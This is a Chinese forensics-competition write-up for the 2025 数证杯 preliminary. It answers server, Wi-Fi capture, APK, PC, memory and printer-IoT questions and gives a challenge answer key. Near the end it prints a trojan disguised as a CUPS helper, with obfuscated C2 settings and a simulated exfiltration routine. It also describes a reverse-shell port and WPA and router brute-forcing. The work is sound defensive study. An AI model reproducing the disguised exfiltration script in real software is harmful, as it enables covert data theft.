25数证杯初赛团体

发表于2026-03-15|更新于2026-03-18|Forensic_电子取证取证write-up数证杯

|总字数:6.8k|阅读时长:23分钟

前言

手机.rar格式放火眼解析不出，解压后才可以。

检材下载

下载链接：https://pan.baidu.com/share/init?surl=IUj600YuLJeYvfIoY_yryQ&pwd=smh3

哈希值：MD5值：be07444b014fdb86393f83139aa20c15

挂载/解压密码：GQ7aXryvOC*M8qG*eXa19K9*g&jtHS*Gtrimps@Qx*aYt4oRwwK*HeN0A$#EPv*u

参考wp：

https://mp.weixin.qq.com/s/-MZFKRd9K8rRfvik5BELYQ

https://mp.weixin.qq.com/s/mluuwiB9LbFaIurMuFkVug

https://forensics.xidian.edu.cn/wiki/Shuzheng2025Preliminary/

一、服务器取证

服务器重构

1.node1节点的磁盘设备SHA256值前六位是？(字母全大写，答案格式：AAAAAA)

一旦仿真镜像，日志就会写入，导致磁盘哈希发生变化。因此要在最开始算出SHA256。

83629C 。。对吗？错了！

node1不等同于检材一

四个检材分别是：

所以是检材二

FC9A341213AC06448213480AA639834A472D7138B70FA9A3A495A469B0281BE5

FC9A34

2.集群配置了多少个node节点？（答案格式：1）

法一：由上图可知

法二：找到master，输入命令kubectl get nodes即可。

3.嫌疑人于什么时间修改master节点的root密码？（使用双位数格式，答案格式：00:00:00）

法一：

法二：在 CentOS 7 系统中，可以通过查看 /var/log/secure 日志文件来确定修改 root 密码的时间。

打开终端，输入命令 sudo grep -i “password changed” /var/log/secure

09:35:59

4.Docker的安装日期是？（使用双位数格式，答案格式：01月01日）

04月08日

5.Docker通过配置守护进程以使用全局代理，该代理地址的端口是？（答案格式：1）

6.发卡网站使用的Mysql数据库对外访问端口是？（答案格式：1）

7.发卡网站部署使用的镜像名称是？（答案格式：root/root）

8.当前Telegram群管机器人使用的容器ID的前六位是？（答案格式：123abc）

9.发卡网站使用的缓存数据库是？（答案格式：mysql）

10.集群中配置的发卡网站代码运行所在的物理目录是？（答案格式：/root/root）

11.Telegram群管机器人配置的API代理域名是？（答案格式：www.xxx.com](https://yuanbao.tencent.com/chat/naQivTmsDa/www.xxx.com))

12.嫌疑人在Telegram上创建的群名称是？（答案格式：比武群）

13.统计嫌疑人在Telegram上创建的群中2025年6月之后成功入群的人数为？（答案格式：1）

14.据嫌疑人交代曾在发卡网上删除过一条订单数据，请找出该删除订单的订单号是？（答案格式：请按实际值填写）

15.发卡网站上2025年6月之后订单交易成功的总金额是？忽略被删除的数据（答案格式：1）

16.发卡网站的后台访问路径是？（答案格式：/root）

17.计算出用户密码算法中Salt的值，并进行Base64编码，结果是？（答案格式：请按实际值填写）

18.发卡网站配置的邮件发送人地址是？（答案格式：abc@abc.com）

19.当前发卡网站首页仪表盘中显示的发卡网站版本为？（答案格式：1.1.1）

20.当前发卡网站中绑定的订单推送Telegram用户id为（答案格式：请按实际值填写）

二、流量包分析

21.黑客攻击的目标路由器SSID为（答案格式：请按实际值填写）

求SSID，选择过滤条件**wlan.fc.type_subtype == 0x05** 或 **wlan.fc.type_subtype == 0x08**

解释：type_subtype 在 Wireshark 过滤器中表示帧的类型和子类型。
常见相关子类型：

0x08 → Beacon frame（AP 定期发送，包含 SSID、速率等信息）
0x05 → Probe response（AP 对 Probe request 的应答，也包含 SSID）

这两种帧都是由**无线接入点（AP / 路由器）**发出的，并且会携带 SSID 信息。

现在需要确定哪一个是被攻击的目标服务器，当进行路由器连接操作时，会发送Association Request，其中就包含目标SSID，此时选择过滤wlan.fc.type_subtype == 0x00，得到答案：

laozhaoWIFI

22.黑客成功捕获了WIFI中WPA协议握手包，其中有效握手包组数为(完整握手为一组)（答案格式：1）

点一个可以显示该组。一共看到四组完整的握手

23.黑客爆破得出的WiFi密码为（提示：密码由小写英文字母和数字组成）（答案格式：abcd1234）

搜索“key”得到：

符合题目格式。

password1110

24.黑客成功连接Wifi后，发现路由器操作系统为？（答案格式：请按实际值填写）

操作系统直接搜distribution

ImmortalWrt

25.黑客对路由器后台进行爆破攻击，该路由器后台密码为（答案格式：请按实际值填写）

直接追踪流，找到那几个 password 的 POST 帧，找被攻击方返回的状态码, 判断哪一个登陆成功。

password

26.黑客通过修改路由器设置，将被劫持的域名为（答案格式：[www.xxx.com]）

27.黑客在路由器管理后台发现FTP服务配置，FTP登录密码为？（答案格式：请按实际值填写）

mast

28.黑客通过FTP上传了一个压缩包文件，该文件内容为（答案格式：请按实际值填写）

保存后发现要解压密码

爆破密码：

code:123456789

29.黑客通过路由器执行shell脚本，反弹shell的监听端口为（答案格式：1）

执行shell脚本, 都会想到用 /bin/sh。因为是 HTTP 传的明文, 所以直接搜索 /bin/sh, 可以看到 nc 连接的端口是 4445,即反弹 shell 的监听端口是 4445。

30.黑客通过反弹shell成功控制目标路由器后，总共执行了多少条命令（答案格式：1)

三、APK程序分析

31.apk 的版本名称为？（答案格式：1.1.1）

或者

3.0.12

32.在该APP中，调用了哪个System的方法用于获取本地系统的时间戳？（答案格式：MainActivity）

分析的第一件事是查壳

一键脱壳

但是我似乎看不出来，可能脱壳没完全

用jeb脱壳

currentTimeMillis

33.apk运行后getVer()的返回值是多少？（答案格式：1.0.0）

getVer()函数是静态函数，直接使用frida主动调用可以得到结果

(() => {
 function getVer() {
    Java.choose("net.net.MainActivity", {
        onMatch: function (instance) {
            console.log(MainActivity instance found: ${instance});
        console.warn(net.net.MainActivity.getVer():${instance.getVer()});
    },
    onComplete: function () {
        console.log("MainActivity instance search completed");
    },
});
}
function main() {
    Java.perform(() => {
                 getVer();
});
}
main();
})();

34.apk运行后需要通过一个http get请求才能打开第二个界面，给出该请求URL？（答案格式：http://www.xxx.com/test?a=1）

35.apk第二界面的8位授权码是什么？（答案格式：11111111）

四、二进制程序分析

36.安装该程序后，该恶意程序的可执行文件所在的直接父目录名称是什么为？（答案格式：root）

下载得桌面快捷方式，跳转到文件所在位置：

proxy

37.解密文件名为RnRGaWxlcy5lZGIiL的文件时所使用的key是什么？（答案格式：请按实际值填写）

38.解密文件RnRGaWxlcy5lZGIiL成功后，请分析并给出解密后的文件的入口点地址？（答案格式：0x180000000）

39.加密文件名为6c051a72b91a1的文件时所使用的密钥是多少？（答案格式：请按实际值填写）

40.6c051a72b91a1.1文件解密后的md5值后六位是多少？（字母全大写，答案格式：AAAAAA）

五、计算机取证分析

41.操作系统的Build版本号是？（答案格式：1）

19044

42.操作系统设置的账户密码最长存留期为多少天？（答案格式：1）

法一：cmd基础命令 net accounts

法二：打开本地组策略编辑器

按 Win + R 键
输入 gpedit.msc回车

43.用户2登陆密码NT哈希值后六位是？（字母全大写，答案格式：AAAAAA）

A9C708

44.蓝牙mac地址是多少？（答案格式：AA-AA-AA-AA-AA-AA）

9C-B6-D0-04-C9-CC

45.SafeImager的产品序列号后四位是？（字母全大写，答案格式：AAAAAA）

09C4

46.123.VHD所处的结束扇区是？（答案格式：1 ）

vhd和虚拟机有关

在X-ways里看

19276304

错的，这是开始扇区

怎么找结束扇区呢？

切换到文件视图, 按下快捷键 Ctrl + End 跳转至文件尾, 再切换回分区视图, 即可看到文件结尾所处的扇区号:

27445255

47.用户在BitLocker加密分区最后修改的文件是?（答案格式：abcd.txt）

打开123.vhd（F盘）找到文件：

恢复秘钥：625075-617309-532576-720302-040975-309232-451924-426679

资料1.txt

48.用户连接192.168.114.129时用的会话名称是？（答案格式：按照实际情况填写）

连接阿里云

49.用户创建存储虚拟币钱包地址页面的时间是？（使用双位数格式，答案格式：01月01日）

这有个教训：火眼仿真时尽量不要重置密码，最好保留，否则这个应用需要key登入账户。

冷知识：Anytype 设置了使用 Windows 用户凭证解锁, 因此只有在仿真时不重置密码的情况下才能自动解锁

显然货币——currency

10月07日

50.用户的虚拟币钱包地址是？（答案格式：按照实际情况填写）

看上去是base64编码，提示34个字符

赛博厨子魔法棒不停炒菜

炒到无法操作为止。确实是34字符

小心求证，也确有其事。

3HrdpWM8ZrBVw9yu8jx1RoNNK6BZxwsHd9

51.用户VC加密容器的密码是？（答案格式：按照实际情况填写）

258369

火眼寻找各部分

应该是要合并到一起才能解压出完整文件

cmd命令copy /B

attrib -r 清除只读属性

52.用户在生活中使用的代号是？（答案格式：按照实际情况填写）

桌面一个可疑文件

方法一：运气好翻到检材自带工具

方法二：音频类一般用Audacity

直接看没有摩斯密码之类的。

看频谱图

小胖

53.李安东的银行卡归属哪个银行？（答案格式：农业银行）

密码爆破

688561

交通银行

54.请分析某市10月6日最高气温是？（答案格式：1）

打开发现需要密码

复制到桌面，随波逐流走一波

里面气温文件还是显示加密，再走一遍

55.用户的BitLocker密码是？（答案格式：按照实际情况填写）

5fb19296b5c8a4b663347b7ba471e86e

但是不对

正确方法是解电脑邮件附件图片隐写。。如何想到这么做？可能因为，这玩意出现在这太诡异猎奇了

我本来还放主机分析的。其实虚拟机有解密软件。

SZBJSJTM2025

56.用户办公室的门禁密码是？（答案格式：按照实际情况填写）

57.用户使用的以D开头的解密程序的MD5值后六位是？（字母全大写，答案格式：AAAAAA）

58.木马程序运行至系统断点前加载了几个动态链接库？（答案格式：1）

59.木马产生的程序名称是什么？（答案格式：abcd.txt）

60.木马尝试访问的域名是什么？（答案格式：按照实际情况填写）

61.分析计算机内存检材，此内存镜像制作时的系统时间是？（使用双位数格式，答案格式：01月01日）

62.分析计算机内存检材，用户Yiyelin的用户表示后4位是？（答案格式：1111）

63.分析计算机内存检材，计算机的CPU型号是什么？（答案格式： i9-1110U）

64.分析计算机内存检材，wps.exe的PID是？（答案格式：1）

65.分析计算机内存检材，此计算机开机自启动的远控软件名称是？（答案格式：abcd.txt ）

六、物联网设备取证分析

66.打印机的主机名称是什么？(答案格式：root)

67.打印文件存储在哪个目录？(答案格式：/root/root)

直接看没有数据

/var/spool/cups

68.同一天，打印两份文件的用户是谁？(答案格式：root)

上题说，日志文件路径/var/log/cups/

一个是连接日志，一个是报错日志。看看page的信息

alice

69.分析物联网检材，木马运行后，自身产生的进程ID是多少？（答案格式：1）

在做这题前，至少我们该知道木马在哪，长什么样

我们可以先使用sudo ss -tunap查看一下网络监听情况（虚拟机是可以搭起来的，虽然是arm架构，但是是可以搭起来的）

然而我们什么都没能找到

因此动态似乎不行，木马似乎在休眠期，我们尝试静态搜索

根据ai一步步走就好，由于70题在那边问执行周期，所以我们可以先去那边看看，因为木马很有可能就是一个非标定时任务

我们知道格式应该是*/x * * * *寻找一下

可以看到有一个healthcheck

因为这个是完全非标准的名称情况

在这边我们看到了70题的答案，而这个/usr/local/bin/cups-helper也被列为重点木马可疑对象，它故意改名为了cups-healper，就是试图伪装成与打印服务（CUPS）相关的合法程序

是个python程序

#!/usr/bin/python3
# -*- coding: utf-8 -*-

# A helper script to manage CUPS spooling and perform health checks.
# Do not modify unless you are an authorized technician.
# KVJEYIHHXSLOPIEBEAWT4ICCMFZWKNRUEDT3ZFXHUCASALJ6EDS23F7HVSTOJOFS4WHY32F5VQ======

import os
import shutil
import socket
import datetime
import re

# --- Configuration ---
# C2 server for uploading diagnostic data
C2_SERVER = "zUTMugDMx4SO5EjL1gTM"
C2_PORT = "zQDN"

# Spool directory to monitor
SPOOL_DIR = "GJTJzBXdjZkMlw2bvB3cGJTJyFmdGJTJ"

# Define staging directory for processing before exfiltration
STAGING_DIR = "GJTJlh2YhNmLGJTJw1GdGJTJ"

# Log file for upload activities
LOG_FILE = "==wZvxmLkF2bsBXdGJTJlJXYoNnRyUCbhN2bs5iRyUCdv9mcGJTJ"

# Keyword to identify sensitive documents for "special handling"
WATCHED_KEYWORD = "=UmcpZmbvdWYyREMyUCdjVmavJHU"
# --- End Configuration ---


def log_message(message):
    """Appends a timestamped message to the log file."""
    now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    full_message = f"[{now}] {message}\n"
    with open(LOG_FILE, 'a') as f:
        f.write(full_message)

def scan_and_stage():
    """(Simulated) Scans the spool directory and copies sensitive files to the staging area."""
    pass

def exfiltrate_data():
    """(Simulated) 'Uploads' files from the staging directory to the C2 server."""
    if not os.path.exists(STAGING_DIR):
        return

    staged_files = os.listdir(STAGING_DIR)
    if not staged_files:
        return

    try:
        # The system log entry shows this connection attempt.
        # This part of the script provides the "ground truth" for that log.
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        # sock.connect((C2_SERVER, C2_PORT)) 
        
        for filename in staged_files:
            log_message(f"SUCCESS: Uploaded {filename} to {C2_SERVER}")
        
        sock.close()
    except Exception as e:
        log_message(f"ERROR: Could not connect to C2 server: {e}")


def main():
    scan_and_stage()
    exfiltrate_data()

if __name__ == "__main__":
    main()